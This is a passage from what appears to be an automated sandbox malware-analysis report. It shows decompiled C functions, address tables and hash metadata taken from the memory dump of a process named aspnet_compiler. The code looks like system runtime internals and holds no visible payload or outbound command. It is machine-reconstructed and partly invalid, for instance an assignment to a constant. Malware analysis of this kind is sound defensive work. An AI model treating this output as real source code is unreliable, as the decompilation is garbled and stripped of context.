					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E011DD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E011B2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L011B4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E011DF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E011AFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x128b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E011DB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                                        0x011c5142
                                                                                        0x011c514c
                                                                                        0x011c5150
                                                                                        0x011c5157
                                                                                        0x011c5159
                                                                                        0x011c515e
                                                                                        0x011c5165
                                                                                        0x011c5169
                                                                                        0x011c516c
                                                                                        0x011c5172
                                                                                        0x011c5176
                                                                                        0x011c517a
                                                                                        0x011c517a
                                                                                        0x011c517a
                                                                                        0x011c517f
                                                                                        0x01206d8b
                                                                                        0x01206d8e
                                                                                        0x01206d91
                                                                                        0x01206d95
                                                                                        0x01206d98
                                                                                        0x01206d9c
                                                                                        0x01206da0
                                                                                        0x01206da3
                                                                                        0x01206da7
                                                                                        0x01206e26
                                                                                        0x01206e26
                                                                                        0x01206e2a
                                                                                        0x011c51f9
                                                                                        0x011c51f9
                                                                                        0x011c51fe
                                                                                        0x01206e33
                                                                                        0x01206e33
                                                                                        0x01206e39
                                                                                        0x01206e3d
                                                                                        0x01206e46
                                                                                        0x01206e50
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01206e52
                                                                                        0x01206e53
                                                                                        0x01206e56
                                                                                        0x01206e5d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01206e5f
                                                                                        0x01206e67
                                                                                        0x01206e77
                                                                                        0x01206e7f
                                                                                        0x01206e80
                                                                                        0x01206e88
                                                                                        0x01206e90
                                                                                        0x01206e9f
                                                                                        0x01206ea5
                                                                                        0x01206ea9
                                                                                        0x01206eb1
                                                                                        0x01206ebf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01206ecf
                                                                                        0x01206ed3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01206edb
                                                                                        0x01206ede
                                                                                        0x01206ee1
                                                                                        0x01206ee8
                                                                                        0x01206eeb
                                                                                        0x01206eed
                                                                                        0x01206ef0
                                                                                        0x01206ef4
                                                                                        0x01206ef8
                                                                                        0x01206efc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01206f0d
                                                                                        0x01206f11
                                                                                        0x01206f32
                                                                                        0x01206f37
                                                                                        0x01206f3b
                                                                                        0x01206f3e
                                                                                        0x01206f41
                                                                                        0x01206f46
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01206f4c
                                                                                        0x01206f50
                                                                                        0x01206f50
                                                                                        0x01206f54
                                                                                        0x01206f62
                                                                                        0x01206f65
                                                                                        0x01206f6d
                                                                                        0x01206f7b
                                                                                        0x01206f7b
                                                                                        0x01206f93
                                                                                        0x01206f98
                                                                                        0x01206fa0
                                                                                        0x01206fa6
                                                                                        0x01206fb3
                                                                                        0x01206fb6
                                                                                        0x01206fbf
                                                                                        0x01206fc1
                                                                                        0x01206fd5
                                                                                        0x01206fda
                                                                                        0x01206fda
                                                                                        0x01206fdd
                                                                                        0x01206fe2
                                                                                        0x01206fe7
                                                                                        0x01206feb
                                                                                        0x01206fef
                                                                                        0x01206ff3
                                                                                        0x011c520c
                                                                                        0x011c520c
                                                                                        0x011c520f
                                                                                        0x011c5215
                                                                                        0x011c5234
                                                                                        0x011c523a
                                                                                        0x011c523a
                                                                                        0x011c5244
                                                                                        0x011c5245
                                                                                        0x011c5246
                                                                                        0x011c5251
                                                                                        0x011c5251
                                                                                        0x01206f13
                                                                                        0x01206f17
                                                                                        0x01206f17
                                                                                        0x01206f18
                                                                                        0x01206f1b
                                                                                        0x01206f1f
                                                                                        0x01206f23
                                                                                        0x00000000
                                                                                        0x01206f28
                                                                                        0x011c5204
                                                                                        0x011c5204
                                                                                        0x011c5208
                                                                                        0x00000000
                                                                                        0x011c5208
                                                                                        0x011c5185
                                                                                        0x011c5188
                                                                                        0x011c518a
                                                                                        0x011c518e
                                                                                        0x011c5195
                                                                                        0x01206db1
                                                                                        0x01206db5
                                                                                        0x01206db9
                                                                                        0x011c519b
                                                                                        0x011c519b
                                                                                        0x011c519e
                                                                                        0x011c51a7
                                                                                        0x011c51a9
                                                                                        0x011c51a9
                                                                                        0x011c51b5
                                                                                        0x011c51b8
                                                                                        0x011c51bb
                                                                                        0x011c51be
                                                                                        0x011c51c1
                                                                                        0x011c51c5
                                                                                        0x011c51c9
                                                                                        0x011c51cd
                                                                                        0x011c51cd
                                                                                        0x011c51d8
                                                                                        0x011c51dc
                                                                                        0x011c51e0
                                                                                        0x01206dcc
                                                                                        0x01206dd0
                                                                                        0x01206dd5
                                                                                        0x01206ddd
                                                                                        0x01206de1
                                                                                        0x01206de1
                                                                                        0x01206de5
                                                                                        0x01206deb
                                                                                        0x01206df1
                                                                                        0x01206df7
                                                                                        0x01206dfd
                                                                                        0x01206e01
                                                                                        0x01206e05
                                                                                        0x01206e09
                                                                                        0x01206e0d
                                                                                        0x01206e11
                                                                                        0x01206e11
                                                                                        0x011c51eb
                                                                                        0x01206e1a
                                                                                        0x01206e1f
                                                                                        0x01206e21
                                                                                        0x01206e23
                                                                                        0x00000000
                                                                                        0x011c51f1
                                                                                        0x011c51f1
                                                                                        0x00000000
                                                                                        0x011c51f1

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        • Opcode ID: 227af6c0aae001779a084027e88854ef3d330e109a8c9f5ac08f9168d8a9126d
                                                                                        • Instruction ID: 1f7de32808abe105ef75ec25eb8677b5303f758be0503634b772d2c75c5edcf1
                                                                                        • Opcode Fuzzy Hash: 227af6c0aae001779a084027e88854ef3d330e109a8c9f5ac08f9168d8a9126d
                                                                                        • Instruction Fuzzy Hash: 2FC124756083818FD359CF28C480A5AFBF2BF88704F144A6EF9998B392D771E945CB42
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011C03E2 Relevance: 1.8, APIs: 1, Instructions: 254COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 74%
                                                                                        			E011C03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x128d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E011C0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E011DB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E011AB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1287c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E011B7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E011B7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01217016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E011D9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E012169A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1287c04 != 0) {
						_t118 = _v12;
						_t120 = E0121A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1287bd8;
						if( *0x1287bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E011D95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E011D99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01213540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0119B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E011DAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1288474 - 3;
										if( *0x1288474 != 3) {
											 *0x12879dc =  *0x12879dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E011B7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E011B7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01217016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1288708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1287b00; // 0x0
							asm("ror esi, cl");
							 *0x128b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E011D95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E011A7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                                        0x011c03f1
                                                                                        0x011c03f7
                                                                                        0x011c03f9
                                                                                        0x011c03fb
                                                                                        0x011c03fd
                                                                                        0x011c0400
                                                                                        0x011c040a
                                                                                        0x01204c7a
                                                                                        0x011c0537
                                                                                        0x011c0547
                                                                                        0x011c0410
                                                                                        0x011c0410
                                                                                        0x011c0414
                                                                                        0x011c0417
                                                                                        0x011c041a
                                                                                        0x011c0421
                                                                                        0x011c0424
                                                                                        0x011c042b
                                                                                        0x011c043b
                                                                                        0x011c043e
                                                                                        0x011c043f
                                                                                        0x011c043f
                                                                                        0x011c0446
                                                                                        0x011c0449
                                                                                        0x011c044c
                                                                                        0x011c044f
                                                                                        0x011c0459
                                                                                        0x01204c8d
                                                                                        0x011c045f
                                                                                        0x011c045f
                                                                                        0x011c045f
                                                                                        0x011c0467
                                                                                        0x01204c97
                                                                                        0x01204c9d
                                                                                        0x01204ca4
                                                                                        0x01204caa
                                                                                        0x01204caf
                                                                                        0x01204cb1
                                                                                        0x01204cc3
                                                                                        0x01204cb3
                                                                                        0x01204cbc
                                                                                        0x01204cbc
                                                                                        0x01204cc8
                                                                                        0x01204ccb
                                                                                        0x01204cd7
                                                                                        0x01204cda
                                                                                        0x01204cdf
                                                                                        0x01204cdf
                                                                                        0x01204ccb
                                                                                        0x01204ca4
                                                                                        0x011c046d
                                                                                        0x011c046f
                                                                                        0x011c046f
                                                                                        0x011c0471
                                                                                        0x011c0476
                                                                                        0x011c047a
                                                                                        0x011c047b
                                                                                        0x011c0483
                                                                                        0x011c0489
                                                                                        0x011c048d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01204ce9
                                                                                        0x01204cef
                                                                                        0x01204d22
                                                                                        0x01204d22
                                                                                        0x00000000
                                                                                        0x01204d22
                                                                                        0x01204cf1
                                                                                        0x01204cf7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01204cf9
                                                                                        0x01204cff
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01204d05
                                                                                        0x01204d07
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01204d0d
                                                                                        0x01204d0f
                                                                                        0x01204d14
                                                                                        0x01204d16
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01204d1c
                                                                                        0x01204d1c
                                                                                        0x011c0499
                                                                                        0x011c0535
                                                                                        0x011c0535
                                                                                        0x00000000
                                                                                        0x011c0535
                                                                                        0x011c04a6
                                                                                        0x01204d2c
                                                                                        0x01204d37
                                                                                        0x01204d39
                                                                                        0x01204d3b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01204d41
                                                                                        0x01204d48
                                                                                        0x011c0527
                                                                                        0x011c052b
                                                                                        0x011c052d
                                                                                        0x011c0530
                                                                                        0x011c0530
                                                                                        0x00000000
                                                                                        0x011c052b
                                                                                        0x01204d4e
                                                                                        0x011c04ac
                                                                                        0x011c04ac
                                                                                        0x011c04af
                                                                                        0x011c04b2
                                                                                        0x011c04b7
                                                                                        0x011c04b9
                                                                                        0x011c04bb
                                                                                        0x011c04bd
                                                                                        0x011c04bf
                                                                                        0x011c04c5
                                                                                        0x011c04c9
                                                                                        0x01204d53
                                                                                        0x01204d59
                                                                                        0x01204db9
                                                                                        0x01204dba
                                                                                        0x01204dbf
                                                                                        0x01204dc2
                                                                                        0x01204dc4
                                                                                        0x01204dc7
                                                                                        0x01204dce
                                                                                        0x00000000
                                                                                        0x01204dce
                                                                                        0x01204d5b
                                                                                        0x01204d61
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01204d63
                                                                                        0x01204d69
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01204d6b
                                                                                        0x01204d6e
                                                                                        0x01204d74
                                                                                        0x01204d76
                                                                                        0x01204d7c
                                                                                        0x01204d7e
                                                                                        0x01204d84
                                                                                        0x01204d89
                                                                                        0x01204d8c
                                                                                        0x01204d8d
                                                                                        0x01204d92
                                                                                        0x01204d95
                                                                                        0x01204d96
                                                                                        0x01204d98
                                                                                        0x01204d9a
                                                                                        0x01204d9f
                                                                                        0x01204da4
                                                                                        0x01204da6
                                                                                        0x01204da8
                                                                                        0x01204daf
                                                                                        0x01204db1
                                                                                        0x01204db1
                                                                                        0x01204daf
                                                                                        0x01204da6
                                                                                        0x01204d84
                                                                                        0x01204d7c
                                                                                        0x00000000
                                                                                        0x01204d74
                                                                                        0x011c04d6
                                                                                        0x01204de1
                                                                                        0x011c04dc
                                                                                        0x011c04dc
                                                                                        0x011c04dc
                                                                                        0x011c04e4
                                                                                        0x01204deb
                                                                                        0x01204df1
                                                                                        0x01204df8
                                                                                        0x01204dfe
                                                                                        0x01204e03
                                                                                        0x01204e05
                                                                                        0x01204e17
                                                                                        0x01204e07
                                                                                        0x01204e10
                                                                                        0x01204e10
                                                                                        0x01204e1c
                                                                                        0x01204e1f
                                                                                        0x01204e35
                                                                                        0x01204e35
                                                                                        0x01204e1f
                                                                                        0x01204df8
                                                                                        0x011c04f1
                                                                                        0x011c04fa
                                                                                        0x01204e3f
                                                                                        0x01204e47
                                                                                        0x01204e5b
                                                                                        0x01204e61
                                                                                        0x01204e67
                                                                                        0x01204e69
                                                                                        0x01204e71
                                                                                        0x01204e73
                                                                                        0x011c0500
                                                                                        0x011c0500
                                                                                        0x011c0500
                                                                                        0x011c04fa
                                                                                        0x011c0508
                                                                                        0x011c051d
                                                                                        0x011c051d
                                                                                        0x011c051f
                                                                                        0x011c0524
                                                                                        0x00000000
                                                                                        0x011c0524
                                                                                        0x011c0515
                                                                                        0x011c0517
                                                                                        0x01204e7a
                                                                                        0x01204e7c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01204e85
                                                                                        0x00000000
                                                                                        0x01204e85
                                                                                        0x00000000
                                                                                        0x011c0517

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3590ca0e8cce4cf3c5836e16418be5d7cc69af79d57f393f0e06c532709a076c
                                                                                        • Instruction ID: af80376b82a16c404a6eb6403f5dd1217d22bcd429d90a850e9cf0e62aa9bee0
                                                                                        • Opcode Fuzzy Hash: 3590ca0e8cce4cf3c5836e16418be5d7cc69af79d57f393f0e06c532709a076c
                                                                                        • Instruction Fuzzy Hash: D2914B35E00296DFEB3AAB6CC844BBEBBA4AB15B14F054365FB10A72D2D7749D00C781
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011BB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 76%
                                                                                        			E011BB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x128d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E011B7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01268CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E011D9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E011DB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E011DCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E011B7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01268F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E011DAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1288628; // 0x0
								_v68 = _t77;
								_t78 =  *0x128862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1288628; // 0x0
							_t116 =  *0x128862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
